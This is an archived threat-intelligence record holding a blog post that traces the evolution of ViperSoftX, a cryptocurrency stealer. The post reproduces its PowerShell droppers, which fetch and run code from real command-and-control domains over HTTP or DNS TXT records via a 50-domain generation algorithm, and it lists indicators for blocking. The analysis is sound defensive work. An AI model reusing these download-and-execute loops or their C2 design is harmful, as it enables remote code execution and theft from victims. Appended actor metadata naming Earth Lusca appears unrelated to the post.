{ "id": "39011c09-00ed-4a86-990e-e38c233bf854", "created_at": "2026-04-06T00:08:41.58758Z", "updated_at": "2026-04-10T03:36:47.921974Z", "deleted_at": null, "sha1_hash": "ddd9157389a8865cf5dbd512cd5bf8263c69459c", "title": "50 Domains Worth Blocking: The Evolution of ViperSoftX's Underreported DGA | tweedge's blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 116956, "plain_text": "50 Domains Worth Blocking: The Evolution of ViperSoftX's\r\nUnderreported DGA | tweedge's blog\r\nPublished: 2022-12-14 · Archived: 2026-04-05 19:52:05 UTC\r\nRecently, Avast released a detailed report tying together information about ViperSoftX and prior research from\r\nseveral other researchers. ViperSoftX is a multi-stage cryptocurrency stealer which is spread within torrents and\r\nfilesharing sites - typically distributed as a malicious crack for popular software - and has siphoned off hundreds\r\nof thousands of dollars in cryptocurrency from its victims.\r\nOne bit of code caught my eye in Avast’s report under the “Hidden Script Variants” section - this simple\r\nPowerShell dropper that downloads \u0026 executes ViperSoftX payloads from a central server:\r\nwhile ($true) {\r\n try {\r\n $r = Invoke-RestMethod -Uri\r\n 'http://wmail-service.com/v1/3f6ef4a8-13dc-425f-bf60-1964e1d1da02?v=MIG2'\r\n if($r -ne '') {\r\n Start-Job ([ScriptBlock]::Create($r)) | Wait-Job\r\n }\r\n } catch {}\r\n Start-Sleep 2\r\n}\r\nI’ve seen that before.\r\nAfter diving deeper into some old notes, I reconstructed what I believe is an accurate history showing the\r\ndevelopment of new versions of this dropper, which now uses a domain generation algorithm (DGA) to maintain\r\ncontrol over target machines without depending on a single domain (and thus, single point of failure). This DGA\r\ngenerates up to 50 domains, but only 1 of which was previously attributed to ViperSoftX by Avast (or any other\r\nreport that I can find).\r\nIf you want to skip ahead, jump to the New IOCs section now where you can get the list of all malicious domains\r\nto sinkhole.\r\nFor the rest, let’s dive into the evolution of ViperSoftX’s stealthiest dropper!1\r\nQuick History of ViperSoftX/VenomSoftX\r\n2020\r\nViperSoftX was first publicly identified in February 2020 by c3rb3ru5d3d53c as a variant of vjw0rm. The author\r\nused PowerShell to copy a persistent backdoor that would run on startup, executing the JavaScript components\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 1 of 10\n\nwhere the operator could run commands, download new payloads, or uninstall the malware. ViperSoftX’s main\r\ngoal was to check the clipboard for cryptocurrency addresses (initially only Bitcoin and Ethereum), then replace\r\nthem with attacker-controlled cryptocurrency addresses.\r\nSimilar findings were reported by FortiGuard Labs several days later, who also dug into the cryptocurrency\r\naddresses they observed from ViperSoftX and noted that the operator had amassed $32k USD (in various\r\ncryptocurrencies) since 2019 in their known cryptocurrency wallets.\r\n2021\r\nIn April 2021, John Hammond dug into a newer sample that stole over $2m in cryptocurrency (at the time),\r\nshowing how successful the operator had become and clearly demonstrating that they’d scaled their operation\r\nwell.\r\nOne month later May 2021, Colin Cowie reviewed an even newer version of ViperSoftX, which had several\r\nnotable changes:\r\nWhile retaining much of the functionality of prior ViperSoftX samples, much of the JavaScript had been\r\nrewritten to PowerShell (ex. C2 functionality),\r\nThis version would start looking for specific cryptocurrency browser extensions in Chromium-based\r\nbrowsers, and\r\nThis version began using a malicious browser extension to do its cryptojacking dirty work.2\r\nWhile pivoting off the unique technique ViperSoftX used to identify if Metamask is installed in Firefox, Colin\r\nfound additional samples that used a new domain, wmail-service.com . This new domain would be the start of a\r\nnew and unexpected direction.\r\nEvolution of the Hidden Script Dropper\r\nThroughout this section: big thanks to an anonymous benefactor for pulling samples from VirusTotal\r\nfor me so I could review and be pretty sure I wasn’t talking out of my ass!\r\nUp until this point, ViperSoftX has been using a moderate initial payload - roughly 15KB in size, which has all\r\ncore functionalities built in. In June 2022, the first samples will emerge which use a tiny dropper - which this\r\noperator will use for stealth, heavily limiting what code is deployed to a victim machine and making it harder for\r\nresearchers to see the full picture of this activity.\r\nJune 15th, 2022\r\nDropper: Load from file at offset, then base64\r\nC2: One known domain, wmail-service.com , uses HTTP\r\nPayload: Not witnessed\r\nOn June 15th, 2022, a topic on malwareremoval.com is started by a person who found a task running on startup:\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 2 of 10\n\n\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NonInteractive -WindowStyle Hidden -ExecutionPolic\r\nThis loads, converts from base64, and then executes data stored in a fake driver. The victim extracted it and found\r\nthis PowerShell script:\r\nwhile ($true) {\r\n try {\r\n $r = Invoke-RestMethod -Uri 'http://wmail-service.com/v1/CECCE2DA-EF51-4D10-B16A-726EEBC7E043?v=Downloads_Co\r\n if($r -ne '')\r\n {\r\n Start-Job ([ScriptBlock]::Create($r)) | Wait-Job\r\n }\r\n }\r\n catch {}\r\n Start-Sleep 2\r\n}\r\nThis is identical to the behavior that Avast would attribute to ViperSoftX’s hidden script dropper in 2022, and also\r\nuses the domain name that Colin identified in 2021. Unfortunately the victim did not record the next stage\r\npayload.\r\nJune 22nd, 2022\r\nDropper: Not witnessed\r\nC2: Changed! One known domain, wmail-endpoint.com , uses HTTP\r\nPayload: Similar to known ViperSoftX samples\r\n(Un)coincidentally only a couple days later on June 22nd, Xavier Mertens would publish a SANS ISC diary about\r\na peculiar PowerShell script which would:\r\nSteal information about cryptocurrency browser extensions,\r\nMonitor the clipboard of the infected computer (but this was commented out), and\r\nCommunicate to C2 using a similar but not identical domain, wmail-endpoint.com\r\nThis is very similar to the behavior that Colin documented, since neither the dropper nor the VenomSoftX\r\nextension were found at the time (that is to say, this appears to have been a standalone upload to VirusTotal that\r\nXavier found), this report wasn’t attributed at the time to ViperSoftX.\r\nJune 28th - July 7th, 2022\r\nDropper: Load from file at offset, then base64\r\nC2: Changed! First implementation of DGA, uses HTTP\r\nPayload: Similar to known ViperSoftX samples, near-identical to Xavier Mertens’ discovered payload\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 3 of 10\n\nA “full” chain showing the new dropper, C2, and payload together would become public roughly two weeks after\r\nXavier’s post, in a thread on whirlpool.net.au where a user found a scheduled task doing ViperSoftX’s usual file\r\nslicing:\r\ncmd.exe /c echo iex \"`$b=[IO.File]::ReadAllBytes('C:\\WINDOWS\\System32\\5fcxiwjk.cqe');`$s=[Text.Encoding]::UTF8\r\nBut discovered a simple DGA instead of the single domain that ViperSoftX would typically rely on.\r\nwhile ($true) {\r\n try {\r\n foreach ($c in (@(\"com\", \"xyz\"))) {\r\n foreach ($a in (@(\"wmail\", \"fairu\", \"bideo\", \"privatproxy\", \"ahoravideo\"))) {\r\n foreach ($b in (@(\"endpoint\", \"blog\", \"chat\", \"cdn\", \"schnellvpn\"))) {\r\n try {\r\n $h = \"$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).co\r\n $r = Invoke-RestMethod -Uri \"http://$a-$b.$c/v2/20827351-787f-4d3a-871a-7a5060767d38?v=Ver_2\" -Timeo\r\n if ($r -ne '') {\r\n Start-Job ([ScriptBlock]::Create($r)) | Wait-Job -Timeout 7200\r\n break;\r\n }\r\n }\r\n catch {\r\n }\r\n }\r\n }\r\n }\r\n }\r\n catch {\r\n }\r\n Start-Sleep -Seconds 5;\r\n}\r\nIn short, this constructs up to 50 different domains, attempting to request data from each and execute the response\r\nsequentially. It uses predefined lists to construct each domain:\r\nBefore the dash: wmail , fairu , bideo , privatproxy , ahoravideo\r\nAfter the dash: endpoint , blog , chat , cdn , schnellvpn\r\nTLD: com or xyz\r\nSo example domains that would be possible to generate are wmail-endpoint.com , bideo-cdn.com , fairu-blog.xyz , etc. Even though this is a fixed list and somewhat simple as far as DGAs go, it still allows the operator\r\nto change infrastructure or suffer the loss of many domains without losing control over their malware. Avast’s\r\nreport noted that one3 of these domains was a ViperSoftX C2 domain - wmail-blog.com - likely because it was\r\nhardcoded in a payload they uploaded to VirusTotal.4\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 4 of 10\n\nOther users on the Whirlpool forums accessed wmail-endpoint.com and received a PowerShell script\r\n(VirusTotal) which was nearly identical to the one Xavier Mertens observed two weeks before.\r\nAugust 11th, 2022\r\nAs an aside, the Whirlpool discussion would also be reported on by Plurbius One on their blog in a post on August\r\n11th, where they reported that they had seen anomalous activity from many of the domains in ViperSoftX’s new\r\nDGA since June 16th, which is likely closer to when the operator started testing out this new version of their\r\ndropper’s C2.\r\nThis is the article that would make me aware of this particular version of the dropper, but neither Pluribus One nor\r\nI at the time attributed this activity to ViperSoftX.\r\nSeptember 30th, 2022\r\nDropper: Changed! Load from registry, then base64\r\nC2: Changed! Uses same DGA, but now queries for DNS TXT records, and validates payloads are signed\r\nby an attacker-controlled key\r\nPayload: Claimed to be identical\r\nThe final distinct evolution of ViperSoftX’s hidden dropper that I’ve observed removed its dependency on slicing\r\nfiles, opting to store the entire dropper script in the Windows registry:\r\n$pJlksNzfFlG=[ScriptBlock];$jGzeUphieqP=[string];$BdtrkcFYlEfOmf=[char]; icm ($pJlksNzfFlG::Create($jGzeUphieqP\r\nThe dropper itself also changed:\r\n$ms = [IO.MemoryStream]::new();\r\nfunction Get-Updates {\r\n param (\r\n $hostname\r\n )\r\n try {\r\n $dns = Resolve-DnsName -Name $hostname -Type 'TXT'\r\n $ms.SetLength(0);\r\n $ms.Position = 0;\r\n foreach ($txt in $dns) {\r\n try {\r\n if ($txt.Type -ne 'TXT') {\r\n continue;\r\n }\r\n $pkt = [string]::Join('', $txt.Strings);\r\n if ($pkt[0] -eq '.') {\r\n $dp = [System.Convert]::FromBase64String($pkt.Substring(1).Replace('_', '+'));\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 5 of 10\n\n$ms.Position = [BitConverter]::ToUInt32($dp, 0);\r\n $ms.Write($dp, 4, $dp.Length - 4);\r\n }\r\n }\r\n catch {\r\n }\r\n }\r\n if ($ms.Length -gt 136) {\r\n $ms.Position = 0;\r\n $sig = [byte[]]::new(128);\r\n $timestamp = [byte[]]::new(8);\r\n $buffer = [byte[]]::new($ms.Length - 136);\r\n $ms.Read($sig, 0, 128) | Out-Null;\r\n $ms.Read($timestamp, 0, 8) | Out-Null;\r\n $ms.Read($buffer, 0, $buffer.Length) | Out-Null;\r\n $pubkey = [Security.Cryptography.RSACryptoServiceProvider]::new();\r\n [byte[]]$bytarr = 6,2,0,0,0,164,0,0,82,83,65,49,0,4,0,0,1,0,1,0,171,136,19,139,215,31,169,242,133,11,146,1\r\n $pubkey.ImportCspBlob($bytarr);\r\n if ($pubkey.VerifyData($buffer, [Security.Cryptography.CryptoConfig]::MapNameToOID('SHA256'), $sig)) {\r\n return @{\r\n timestamp = ([System.BitConverter]::ToUInt64($timestamp, 0));\r\n text = ([Text.Encoding]::UTF8.GetString($buffer));\r\n };\r\n }\r\n }\r\n }\r\n catch {\r\n }\r\n return $null;\r\n}\r\nwhile ($true) {\r\n try {\r\n $update = @{\r\n timestamp = 0;\r\n text = '';\r\n };\r\n foreach ($c in (@(\"com\", \"xyz\"))) {\r\n foreach ($a in (@(\"wmail\", \"fairu\", \"bideo\", \"privatproxy\", \"ahoravideo\"))) {\r\n foreach ($b in (@(\"endpoint\", \"blog\", \"chat\", \"cdn\", \"schnellvpn\"))) {\r\n try {\r\n $h = \"$a-$b.$c\";\r\n $r = Get-Updates $h\r\n if ($null -ne $r) {\r\n if ($r.timestamp -gt $update.timestamp) {\r\n $update = $r;\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 6 of 10\n\n}\r\n }\r\n }\r\n catch {\r\n }\r\n }\r\n }\r\n }\r\n if ($update.text) {\r\n $job = Start-Job -ScriptBlock ([scriptblock]::Create($update.text));\r\n $job | Wait-Job -Timeout 14400;\r\n $job | Stop-Job;\r\n }\r\n }\r\n catch {\r\n }\r\n Start-Sleep -Seconds 30;\r\n}\r\nWhile it’s much bulkier overall, the changes themselves are straightforward:\r\nInstead of accepting arbitrary input, the operator implemented a feature that now verifies payloads received\r\nby the dropper are signed by a particular RSA keypair (ex. to guard against rogue persons taking over the\r\noperator’s domains).\r\nThe operator now queries DNS for TXT records for domains in the DGA, then joins all TXT records\r\nreturned by a given domain together. HTTP is no longer used (by the dropper specifically) to fetch the next\r\npayload.\r\nFunctionally identical versions have been seen since on Reddit on r/techsupport and r/cybersecurity_help\r\nthrough until December, so it seems like the operator may have settled in for now and isn’t making new changes\r\nto this particular dropper variant.\r\nFuture Work\r\nBut for defenders, there’s much to do. I hope that by raising awareness of this ongoing threat to tens or hundreds\r\nof thousands of people worldwide that contemporary antimalware providers will begin to detect and remove\r\nViperSoftX from computers worldwide.\r\nAs it stands today, only 2/61 vendors flagged the most recent ViperSoftX dropper sample from September as\r\nmalicious (VT). For the ViperSoftX dropper from July, that only increases to 12/61 (VT). Given that these\r\nprograms can execute arbitrary input so long as it’s signed by the malware author, even if VenomSoftX becomes\r\nthe most sinkholed software on earth, too many people are still at risk.\r\nHow many people exactly? Avast estimated that hotspot countries are India, the USA, and Italy, with under 10,000\r\nactive infections each. I think that’s conservative. At this time, I own 18/50 domains in ViperSoftX’s DGA (just\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 7 of 10\n\nfor monitoring) - and within the past 30 days, my monitoring infrastructure has served over 900,000 HTTP\r\nrequests and over 3 billion DNS queries, not including caching by public DNS resolvers. Many of the DGA\r\ndomains I own rank in the top 20,000 domains globally, according to Cloudflare Radar - a horrifying statistic.\r\nI’ll be working on releasing more information about what I’m seeing over the coming months, as well as working\r\nwith impacted users to try to find and report more of the accounts responsible for distributing so many infected\r\ntorrents. If you or anyone you know has had a ViperSoftX infection, feel free to send me an anonymous tip via\r\nmy contact page with links to any torrented software you’ve downloaded that you feel could be suspect.5\r\nNew IOCs\r\nDomains\r\nBelow are two lists of domains referenced by ViperSoftX’s dropper that you (and your security vendor, etc.)\r\nshould filter on your network:\r\n50 domains in the DGA (includes malicious and benign domains)\r\n32 domains that aren’t owned by me\r\nFor those who skipped here, hi, sorry, I own 18 of the 50 domains in the ViperSoftX DGA.\r\nI do ask, please only send abuse reports for domains you can confirm malicious activity from - for example, in\r\ncase other researchers also had the idea to register some domains in ViperSoftX’s DGA.\r\nHowever in my opinion, please sinkhole all 50 domains, including domains I own. This is for several reasons:\r\nNone of these domains used to exist/host anything else/etc., they’re disposable domains for a reason.\r\nThe nature of this malware campaign - a dropper distributed by torrents and filesharing sites - means that\r\nnew infections could be cropping up for months or years, given the popularity and longevity of torrents.\r\nI cannot promise that I can hold all 18 domains in the ViperSoftX DGA forever - for example, I may die,\r\nallowing those domains to go on to the open market and picked up by an unscrupulous actor (or the\r\noriginal malware operator, etc.).\r\nMy goal is to help raze this version of the ViperSoftX DGA to the ground. I am not Microsoft or Google.\r\nI’m no security vendor. I can’t stop ViperSoftX - but I can help try to force the ViperSoftX operator to\r\nswitch infrastructure/tactics. I’ll know if that’s working by how much traffic my domains in the DGA see -\r\nor how much it drops.\r\nDomain Safety Matrices\r\nFor those who need to quickly look up whether a particular domain is owned by me or someone else, here are two\r\ntables you can use to look that up. .com domains are in the first table, then .xyz .\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 8 of 10\n\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 9 of 10\n\nVT Links\r\nSample 1 - Example dropper with DGA, using HTTP as the communication channel.\r\nSample 2 - Example dropper with DGA, using DNS as the communication channel.\r\n(Note: it’s late, I’ll expand this later.)\r\nAppendix\r\nSource: https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nhttps://chris.partridge.tech/2022/evolution-of-vipersoftx-dga\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://chris.partridge.tech/2022/evolution-of-vipersoftx-dga" ], "report_names": [ "evolution-of-vipersoftx-dga" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434121, "ts_updated_at": 1775792207, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ddd9157389a8865cf5dbd512cd5bf8263c69459c.pdf", "text": "https://archive.orkl.eu/ddd9157389a8865cf5dbd512cd5bf8263c69459c.txt", "img": "https://archive.orkl.eu/ddd9157389a8865cf5dbd512cd5bf8263c69459c.jpg" } }